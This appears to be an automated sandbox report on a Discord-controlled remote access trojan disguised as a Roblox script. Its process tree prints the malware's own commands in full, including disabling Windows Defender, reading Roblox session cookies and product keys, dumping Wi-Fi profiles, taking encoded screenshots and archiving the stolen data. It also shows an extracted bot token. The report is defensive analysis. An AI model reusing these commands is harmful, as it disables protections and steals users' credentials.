Resubmissions

13-05-2024 22:09

240513-124ajsfe9y 10

13-05-2024 22:01

240513-1xljyafd4w 10

Analysis

  • max time kernel
    10s
  • max time network
    46s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-05-2024 23:41

General

  • Target

    Robloxscript.exe

  • Size

    6.0MB

  • MD5

    1647c032f8e2c490936d578ae193e799

  • SHA1

    a3c57bc5a1021bd1f34eb3f307208b189c8fd9d4

  • SHA256

    99102d69babf9f72ab79ccb7fa3f3c3f33ff9963300c739557d3de7ec847b36d

  • SHA512

    355cd1e95be9c4bfba6302246e25a4de78e63945261724be54faa1fdd05604614e62eb50cef0dd9b4856074f6ffb7c91c9f3851475c564ddf2fae9fc5c3437b9

  • SSDEEP

    98304:Ur+yFEtdFBgfamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R4BMgUd3mszwF:Ur+PFheN/FJMIDJf0gsAGK4R4ug80F

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTIzODY2NDMwNzM2NTkwODUyMQ.GDvhgA.XMPH7BZJagiRxu6AdE_1g9HRnMxqmrvHaYqdNA

  • server_id

    1238663060147667046

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
    "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:816
    • C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe
      "C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Robloxscript.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2464
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4312
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:756
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:72
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ​ .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1452
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2980
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1952
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4048
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
            PID:332
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2164
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4644
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4400
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:4460
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2428
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2480
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eywdc1l1\eywdc1l1.cmdline"
                5⤵
                  PID:2236
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C6A.tmp" "c:\Users\Admin\AppData\Local\Temp\eywdc1l1\CSC8CF3FC97CF5E4F4DA945C12A2B7D1229.TMP"
                    6⤵
                      PID:4092
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:764
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:4516
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3660
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2984
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2388
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:768
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:3036
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              3⤵
                                PID:3412
                                • C:\Windows\system32\tree.com
                                  tree /A /F
                                  4⤵
                                    PID:1688
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:4620
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4080
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:1572
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4860
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "getmac"
                                      3⤵
                                        PID:2236
                                        • C:\Windows\system32\getmac.exe
                                          getmac
                                          4⤵
                                            PID:4628
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\oOZyR.zip" *"
                                          3⤵
                                            PID:4772
                                            • C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe
                                              C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe a -r -hp"skid" "C:\Users\Admin\AppData\Local\Temp\oOZyR.zip" *
                                              4⤵
                                              • Executes dropped EXE
                                              PID:3040
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                            3⤵
                                              PID:4904
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic os get Caption
                                                4⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:412
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                              3⤵
                                                PID:2096
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  4⤵
                                                    PID:2620
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  3⤵
                                                    PID:432
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      4⤵
                                                        PID:5084
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      3⤵
                                                        PID:1188
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3148
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        3⤵
                                                          PID:2272
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            4⤵
                                                            • Detects videocard installed
                                                            PID:2708
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          3⤵
                                                            PID:5096
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2108

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        74e4a39ae145a98de20041613220dfed

                                                        SHA1

                                                        ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                        SHA256

                                                        2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                        SHA512

                                                        96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        944B

                                                        MD5

                                                        408641808e457ab6e23d62e59b767753

                                                        SHA1

                                                        4205cfa0dfdfee6be08e8c0041d951dcec1d3946

                                                        SHA256

                                                        3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

                                                        SHA512

                                                        e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Filesize

                                                        944B

                                                        MD5

                                                        45f53352160cf0903c729c35c8edfdce

                                                        SHA1

                                                        b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

                                                        SHA256

